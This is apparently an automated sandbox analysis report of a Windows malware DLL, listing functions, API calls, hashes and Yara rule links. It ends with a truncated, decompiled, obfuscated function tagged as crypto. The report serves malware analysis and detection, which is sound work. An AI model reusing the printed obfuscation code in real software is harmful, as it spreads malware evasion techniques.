                          • Instruction Fuzzy Hash: 1141C172E04615EFDB118FD9C900BEE3AB9EFC1794F114919E81567B44E7718D428BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: cf7f7f4e4bfcde04ef42625a18b5b11a7d6fcd91abf32705ebafedcc8cb61933
                          • Instruction ID: 508dd27088c6dacb25ddc2774f5f57e5432dea86ba84956806e42f1768606531
                          • Opcode Fuzzy Hash: cf7f7f4e4bfcde04ef42625a18b5b11a7d6fcd91abf32705ebafedcc8cb61933
                          • Instruction Fuzzy Hash: AE214C72D00619AFDB618ED5C840AAF3A7AEFC1B94B018515FC2567B18E331CD518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ECDC4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ECDC4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: 5f541032547465345c2709c234cc3e0496ef1f5dd6bbf2c39b88925df1b38d12
                          • Instruction ID: c0bbf1dee56fa61bfeb6ba92dfe51bc4ad8f3b1ad3091e9dfa4500cf84b41705
                          • Opcode Fuzzy Hash: 5f541032547465345c2709c234cc3e0496ef1f5dd6bbf2c39b88925df1b38d12
                          • Instruction Fuzzy Hash: 43B092B2E08D82669EA16BF36F0CE663978AD5121B34284906923E9184DB30C108DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6ECDC465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ECDC475
                          Strings
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6ECDC460
                          • WakeByAddressSingle, xrefs: 6ECDC46F
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 447fcd1ee9fbe86bbfeb57c01017580702c215440c770d51308a145ebeaa2541
                          • Instruction ID: d016a2dfb48bcae3e017dd562599f9eaa30b5d0273cf097f5cd4a3c188d5819a
                          • Opcode Fuzzy Hash: 447fcd1ee9fbe86bbfeb57c01017580702c215440c770d51308a145ebeaa2541
                          • Instruction Fuzzy Hash: D6B092B2A08D81669E907BF26F0CE662938AD8221734244906663D91C1DB348108DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF1AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6ECF1AA9
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECF1AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECF1B01
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: db3a87d8eabc891ae83f6f3fde56ee6d86dc2ae458ea9c3921ac6a38cb1590a1
                          • Instruction ID: 5028f68be0ec6b43847977a3e52524faecda03b7de6f4503d41140260b107d36
                          • Opcode Fuzzy Hash: db3a87d8eabc891ae83f6f3fde56ee6d86dc2ae458ea9c3921ac6a38cb1590a1
                          • Instruction Fuzzy Hash: 0E1126F2501949FF6B8157FB5D89CAF697CDE462987204926F402D2102FB70CF0741B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6ECEA161
                            • Part of subcall function 6ECEA7ED: InitializeSListHead.KERNEL32(6ED2B140,6ECEA16B,6ED27D60,00000010,6ECEA0FC,?,?,?,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8), ref: 6ECEA7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ECEA1CB
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: b2493987e26fe8b79ab1ca9146eaacc7c90a83720bfe7eac57c999017457f7d2
                          • Instruction ID: c24aa0d8c5cb8675182720a5eea8ac3cf81b667545dfc4ff6d2a6724ae77fcc9
                          • Opcode Fuzzy Hash: b2493987e26fe8b79ab1ca9146eaacc7c90a83720bfe7eac57c999017457f7d2
                          • Instruction Fuzzy Hash: 08213632648381DEEF91ABF49504BDC37B59F8636CF108C19E4652BAC1FB720442C6A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF209C, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 6ECF20E8
                          • GetFileType.KERNELBASE(00000000), ref: 6ECF20FA
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: ed37001268d8e29e81528da8417803326f397d599455fd5fff8ee41074174c2e
                          • Instruction ID: 903f6063300304b6852db6e9922a833ab5793ec6eb1d6db2d06295e1df2e19e9
                          • Opcode Fuzzy Hash: ed37001268d8e29e81528da8417803326f397d599455fd5fff8ee41074174c2e
                          • Instruction Fuzzy Hash: 9411B772104B82CAD7B44D7F8CB46127AA5AF57370B344719F6B6971F9E630D883C248
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01102C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 01102CBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID: &xU`
                          • API String ID: 1586166983-1954668127
                          • Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction ID: d44e82ab7c6bbc1e19c6d2b5372ba3bcd86381978dda916107bd17e00f7e44ef
                          • Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
                          • Instruction Fuzzy Hash: 62011675D11248BFDB09DFD5994A99EBFB4EF04214F00C098E81966220D7B19B109B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECECCF1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,6ECEF75B,?,?,?,?,00000000,?,00000000,?,?,6ECF27EE,?,6ECF267D,00000000,?), ref: 6ECEF57F
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 5c5c825370e7bf9405e07f6feedcad6df729511229f46ca053549e7abaf478f1
                          • Instruction ID: f2f405f0d146e3b1251abbeb70989308512e4cb1a6b18277db75143210bb2f67
                          • Opcode Fuzzy Hash: 5c5c825370e7bf9405e07f6feedcad6df729511229f46ca053549e7abaf478f1
                          • Instruction Fuzzy Hash: 44E086617807CBAEF9991EF02D2BBA6199D6F55B4CF6405246B3CAC9C5FF94C1068011
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEF563, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,6ECEF75B,?,?,?,?,00000000,?,00000000,?,?,6ECF27EE,?,6ECF267D,00000000,?), ref: 6ECEF57F
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 5153fd287816e31193f0103d5b3cc1b7524bb7216c9cfa0f0aa33bf76444342f
                          • Instruction ID: d5278920b5abd78db44ae8bf2edc4e3fd8287da0905374d0a52bdea59f5d3a21
                          • Opcode Fuzzy Hash: 5153fd287816e31193f0103d5b3cc1b7524bb7216c9cfa0f0aa33bf76444342f
                          • Instruction Fuzzy Hash: E3E0C2627807CBAAF99819F02D2BB951A5D5F15B0CF2005286B2CAC9C5FF9082068012
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF0566, Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON
                          Download Yara Rule
                          APIs
                          • HeapAlloc.KERNEL32(00000008,?,?,?,6ECF017F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ECEA44C,?,?,6ECE99B4), ref: 6ECF05A7
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: dded3e80e0029dda58724d1fa488d568cfbbf9f5219b092365cca0263973a868
                          • Instruction ID: cd39fced8fdfef8e2f538df30d60eb6cf02eb3369940cb9cb2d20951547c8340
                          • Opcode Fuzzy Hash: dded3e80e0029dda58724d1fa488d568cfbbf9f5219b092365cca0263973a868
                          • Instruction Fuzzy Hash: B7F02B31205625EBEBD05AF39D12A4B3749AF41F62B104011EC14A7088FBB0E50242A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEFC29, Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          APIs
                          • HeapAlloc.KERNEL32(00000000,?,?,?,6ECEA44C,?,?,6ECE99B4,00000400,FFFDD001,?,?,?), ref: 6ECEFC5B
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: 84274b9a0db7d646bad474c9477981a8fd6aa15676efc35829e5a6d0066b3c4c
                          • Instruction ID: 8402b7ad0ba7d94f8c962e4e3102a38492f5b81f5e05c8fc7762da0a7567be26
                          • Opcode Fuzzy Hash: 84274b9a0db7d646bad474c9477981a8fd6aa15676efc35829e5a6d0066b3c4c
                          • Instruction Fuzzy Hash: 77E0E531245292AFEB6116E67D11B9A3A4CAF02BE0F320520ECA196DC8FF60C44141A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEFBCA, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32(?,?,6ECEE812,00000000,6ED27FB8,0000000C,6ECEE7D9,?,?,6ECF0599,?,?,6ECF017F,00000001,00000364,?), ref: 6ECEFBD9
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CriticalEnterSection
                          • String ID:
                          • API String ID: 1904992153-0
                          • Opcode ID: 458322629406d662cbba6c4bb31148130248e185d921ae345d3e55d0afef633f
                          • Instruction ID: 5749982b4c9a3a46a978d50c22d946494e073d61247bbe0af3b49cd2b3949124
                          • Opcode Fuzzy Hash: 458322629406d662cbba6c4bb31148130248e185d921ae345d3e55d0afef633f
                          • Instruction Fuzzy Hash: 0DB09B7344030897CF005A96DD49C557B5CD5D15157544011F51D87151D571E7505594
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0110CF6E, Relevance: 32.4, Strings: 25, Instructions: 1116COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E0110CF6E(void* __fp0) {
				char _v12;
				signed int _v32;
				char _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				char _v96;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				unsigned int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				unsigned int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				unsigned int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _t1171;
				signed int _t1199;
				void* _t1208;
				signed int _t1215;
				signed int _t1239;
				void* _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1355;
				signed int _t1361;
				void* _t1363;
				signed int _t1376;
				signed int _t1389;
				signed int _t1392;
				void* _t1394;
				void* _t1401;
				void* _t1402;
				void* _t1403;
				void* _t1408;

				_t1408 = __fp0;
				_t1394 = (_t1392 & 0xfffffff8) - 0x248;
				_v372 = 0x11a996;
				_v372 = _v372 | 0x2cdede17;
				_v372 = _v372 ^ 0x9e5241ab;
				_v372 = _v372 ^ 0xb28dbf3e;
				_v476 = 0xec8e3c;
				_t1389 = 0x3d;
				_v476 = _v476 / _t1389;
				_v476 = _v476 << 0xe;
				_t1363 = 0xf612bd7;
				_v476 = _v476 + 0x86a4;
				_v476 = _v476 ^ 0xf83106a4;
				_v552 = 0xb6fc08;
				_v552 = _v552 + 0xffff78f9;
				_v552 = _v552 >> 5;
				_v552 = _v552 + 0x964;
				_v552 = _v552 ^ 0x0005bd0c;
				_v164 = 0x6cf0cb;
				_v164 = _v164 + 0x2d38;
				_v164 = _v164 ^ 0x006e4f0a;
				_v396 = 0xca2604;
				_t1355 = 9;
				_v396 = _v396 / _t1355;
				_v396 = _v396 + 0xffff2c0a;
				_v396 = _v396 ^ 0x00191040;
				_v404 = 0xe62abf;
				_v404 = _v404 + 0x8c5;
				_v404 = _v404 ^ 0x7e28cfe8;
				_v404 = _v404 ^ 0x7ecc7d39;
				_v196 = 0xdfa594;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x0df6229b;
				_v448 = 0xa623aa;
				_v448 = _v448 + 0xfffff930;
				_v448 = _v448 + 0x5479;
				_t1244 = 0x43;
				_v448 = _v448 * 0x5e;
				_v448 = _v448 ^ 0x3d1a2986;
				_v244 = 0x6db25c;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x000d186e;
				_v252 = 0x36c35e;
				_v252 = _v252 * 0x29;
				_v252 = _v252 ^ 0x08c874ed;
				_v256 = 0x92f5ab;
				_v256 = _v256 / _t1244;
				_v256 = _v256 ^ 0x000513c4;
				_v152 = 0x624e9c;
				_v152 = _v152 ^ 0xbf8524d0;
				_v152 = _v152 ^ 0xbfe3d4e9;
				_v420 = 0x1b91b1;
				_v420 = _v420 >> 0xe;
				_v420 = _v420 ^ 0xbc11b449;
				_v420 = _v420 ^ 0xbc1940e0;
				_v428 = 0x35c239;
				_v428 = _v428 << 0x10;
				_v428 = _v428 * 0xf;
				_v428 = _v428 ^ 0x615be0e7;
				_v412 = 0xaa3e36;
				_v412 = _v412 ^ 0x4195c930;
				_v412 = _v412 + 0xffff08aa;
				_v412 = _v412 ^ 0x413d1b8a;
				_v516 = 0x4f83fe;
				_v516 = _v516 + 0x6479;
				_v516 = _v516 >> 0xd;
				_v516 = _v516 + 0x8f37;
				_v516 = _v516 ^ 0x0003a594;
				_v460 = 0x3b47a3;
				_v460 = _v460 >> 0xf;
				_v460 = _v460 << 0xa;
				_v460 = _v460 ^ 0x6bb8ccf5;
				_v460 = _v460 ^ 0x6bbe5b20;
				_v288 = 0xe83c28;
				_v288 = _v288 << 2;
				_v288 = _v288 << 0xd;
				_v288 = _v288 ^ 0x1e105215;
				_v188 = 0x7ca1e2;
				_t1245 = 0x32;
				_v188 = _v188 / _t1245;
				_v188 = _v188 ^ 0x000080c3;
				_v312 = 0xe8c502;
				_v312 = _v312 << 6;
				_t1246 = 0x14;
				_v312 = _v312 / _t1246;
				_v312 = _v312 ^ 0x02e811b7;
				_v512 = 0x506324;
				_v512 = _v512 + 0xffffa476;
				_t1239 = 0x3e;
				_v512 = _v512 / _t1239;
				_t1247 = 0x3a;
				_v512 = _v512 * 0x75;
				_v512 = _v512 ^ 0x00964a53;
				_v192 = 0xa17d2b;
				_v192 = _v192 / _t1247;
				_v192 = _v192 ^ 0x000c9c42;
				_v328 = 0xf3cb9f;
				_v328 = _v328 >> 6;
				_t1248 = 0x1c;
				_v328 = _v328 / _t1248;
				_v328 = _v328 ^ 0x00047e50;
				_v568 = 0xb4987;
				_v568 = _v568 * 0x7e;
				_v568 = _v568 + 0xffffe3e9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xe14bd941;
				_v560 = 0xec3e98;
				_v560 = _v560 ^ 0xe62f879f;
				_v560 = _v560 + 0xcd0b;
				_v560 = _v560 | 0x4c02ef5f;
				_v560 = _v560 ^ 0xeeccf5d9;
				_v200 = 0x5a6674;
				_v200 = _v200 + 0xffff99a3;
				_v200 = _v200 ^ 0x005610d4;
				_v376 = 0x951f7b;
				_v376 = _v376 + 0xffff1e6a;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0x43d62c1e;
				_v480 = 0x253370;
				_v480 = _v480 + 0xffff5e0c;
				_v480 = _v480 ^ 0x4725f15e;
				_v480 = _v480 ^ 0x431e7b32;
				_v480 = _v480 ^ 0x041a819f;
				_v488 = 0xf504e;
				_v488 = _v488 ^ 0x8afc483d;
				_t1249 = 0x78;
				_v488 = _v488 / _t1249;
				_v488 = _v488 >> 2;
				_v488 = _v488 ^ 0x004bc9c5;
				_v432 = 0x264d28;
				_v432 = _v432 + 0xffff75ed;
				_t1250 = 0x68;
				_v432 = _v432 * 0x42;
				_v432 = _v432 * 0x29;
				_v432 = _v432 ^ 0x8f2bacde;
				_v424 = 0xfb0b5a;
				_v424 = _v424 / _t1250;
				_v424 = _v424 + 0x8fe5;
				_v424 = _v424 ^ 0x000fa342;
				_v276 = 0x945485;
				_t1251 = 0x58;
				_v276 = _v276 * 0x66;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00030acd;
				_v284 = 0xfe8523;
				_v284 = _v284 + 0xffff992e;
				_v284 = _v284 * 0x3b;
				_v284 = _v284 ^ 0x3a9fc3e9;
				_v204 = 0xd03e87;
				_v204 = _v204 << 1;
				_v204 = _v204 ^ 0x01ae29a0;
				_v532 = 0xe39128;
				_v532 = _v532 >> 0xa;
				_v532 = _v532 + 0x3850;
				_v532 = _v532 >> 9;
				_v532 = _v532 ^ 0x0003be81;
				_v484 = 0xf46b6c;
				_v484 = _v484 + 0x93dc;
				_v484 = _v484 ^ 0x38165e08;
				_v484 = _v484 << 2;
				_v484 = _v484 ^ 0xe38c7aac;
				_v508 = 0x8f3290;
				_v508 = _v508 ^ 0xa08d31a4;
				_v508 = _v508 ^ 0x86e9d3f2;
				_v508 = _v508 / _t1251;
				_v508 = _v508 ^ 0x00769529;
				_v268 = 0xbca9bd;
				_v268 = _v268 >> 9;
				_v268 = _v268 ^ 0x99e75598;
				_v268 = _v268 ^ 0x99ee6fd0;
				_v280 = 0x6eab4c;
				_v280 = _v280 * 0x70;
				_v280 = _v280 | 0x2a8368f2;
				_v280 = _v280 ^ 0x3aeb8999;
				_v336 = 0xfeaa1a;
				_v336 = _v336 + 0xc621;
				_v336 = _v336 >> 0xc;
				_v336 = _v336 ^ 0x00018288;
				_v260 = 0xb80c8c;
				_v260 = _v260 << 2;
				_v260 = _v260 + 0xffffeecc;
				_v260 = _v260 ^ 0x02ee289c;
				_v148 = 0x546f23;
				_v148 = _v148 * 0x59;
				_v148 = _v148 ^ 0x1d5187ab;
				_v468 = 0xcace2e;
				_t1252 = 0x4a;
				_v468 = _v468 * 0x32;
				_v468 = _v468 ^ 0x87ede715;
				_v468 = _v468 ^ 0x2291661e;
				_v468 = _v468 ^ 0x82ed45c4;
				_v408 = 0xc766f1;
				_v408 = _v408 + 0xffff5da0;
				_v408 = _v408 >> 8;
				_v408 = _v408 ^ 0x00014620;
				_v580 = 0xa2fcf5;
				_v580 = _v580 >> 9;
				_v580 = _v580 * 0x43;
				_v580 = _v580 >> 5;
				_v580 = _v580 ^ 0x000ed575;
				_v248 = 0xe5a82a;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x0e5339c8;
				_v400 = 0x713d32;
				_v400 = _v400 + 0xffff6125;
				_v400 = _v400 + 0xffff0e23;
				_v400 = _v400 ^ 0x006139cc;
				_v572 = 0xacbde5;
				_v572 = _v572 + 0xe14d;
				_v572 = _v572 ^ 0x7b2f3d4f;
				_v572 = _v572 ^ 0x3898bf0b;
				_v572 = _v572 ^ 0x431bbf4c;
				_v296 = 0x6dbc00;
				_v296 = _v296 / _t1252;
				_v296 = _v296 | 0x4c9f59fd;
				_v296 = _v296 ^ 0x4c974d7a;
				_v564 = 0xf21c48;
